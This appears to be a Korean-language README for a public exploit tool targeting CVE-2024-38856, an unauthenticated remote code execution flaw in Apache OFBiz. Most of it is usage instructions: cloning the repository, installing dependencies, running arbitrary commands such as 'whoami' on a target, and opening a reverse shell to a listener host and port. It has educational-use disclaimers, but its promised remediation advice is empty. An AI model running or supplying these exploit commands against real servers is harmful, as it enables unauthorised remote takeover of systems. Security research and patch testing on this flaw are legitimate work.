
Apache OFBiz용 익스플로잇 - CVE-2024-38856
Apache OFBiz 익스플로잇 (CVE-2024-38856) 제작자: Alisson Faoli
이 저장소는 Apache OFBiz에서 발견된 CVE-2024-38856 취약점에 대한 익스플로잇을 포함합니다. 이 결함은 인증되지 않은 RCE(원격 코드 실행)를 허용합니다.
참고: 이 익스플로잇은 교육 및 연구 목적으로만 제공됩니다. 오용은 불법일 수 있으며 사용자의 단독 책임입니다.
CVE: CVE-2024-38856
영향 받는 소프트웨어: Apache OFBiz 버전 18.12.14까지
취약점 유형: RCE
악용 조건: 인증 불필요
저장소 복제:
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
의존성 설치:
pip install -r requirements.txt
익스플로잇 실행:
RCE:
python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"
SHELL:
python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444
이 취약점을 해결하려면 Apache OFBiz 관리자가 다음을 권장합니다:
질문이 있거나 익스플로잇 개선 사항을 보고하려면 저에게 연락하세요: LinkedIn: https://linkedin.com/in/alisson-faoli/
이 코드는 오직 교육 목적과 승인된 환경에서의 보안 테스트를 위해 제공됩니다. 작성자는 오용에 대해 책임지지 않습니다.